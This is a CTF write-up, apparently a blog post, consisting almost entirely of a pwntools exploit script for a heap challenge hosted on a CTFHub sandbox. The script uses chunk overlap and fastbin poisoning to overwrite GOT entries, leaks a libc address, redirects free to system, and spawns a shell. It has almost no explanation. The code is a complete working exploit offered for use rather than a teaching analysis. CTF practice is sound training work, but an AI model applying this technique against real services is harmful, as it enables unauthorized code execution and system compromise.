慢慢更,太懒了直接给出代码
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-049a92ae96535d90.sandbox.ctfhub.com",31154)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23.so")
def add(size):
io.recvuntil(b"Choice:")
io.sendline(b"1")
io.recvuntil(b"Size: ")
io.sendline(str(size))
def edit(idx,data):
io.recvuntil(b"Choice:")
io.sendline(b"2")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
io.recvuntil(b"Content: ")
io.sendline(data)
def free(idx):
io.recvuntil(b"Choice:")
io.sendline(b"3")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
puts_plt = elf.plt['puts']
free_got = elf.got['free']
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
add(0x18)
for i in range(1,28):
add(0x10)
add(0x21)
ptr_chunk = 0x602130-8
edit(0,b"a"*0x18+p64(0x41))
free(1)
free(2)
add(0x30)
edit(1,p64(0)*3+p64(0x21)+p64(ptr_chunk))
add(0x10)
free(30)
add(0x18)
edit(29,b"a"*8+p64(free_got)+p64(atoi_got))
edit(0,p64(puts_plt)+p64(printf_plt))
free(1)
atoi_addr = u64(io.recv(6).ljust(8,b"\x00"))
libc_addr = atoi_addr-libc.sym['atoi']
system_addr = libc_addr+libc.sym['system']
print(hex(libc_addr))
print(hex(atoi_addr))
edit(5,b"/bin/sh\x00")
edit(0,p64(system_addr)+p64(printf_plt))
# add(0x10)
free(5)
io.interactive()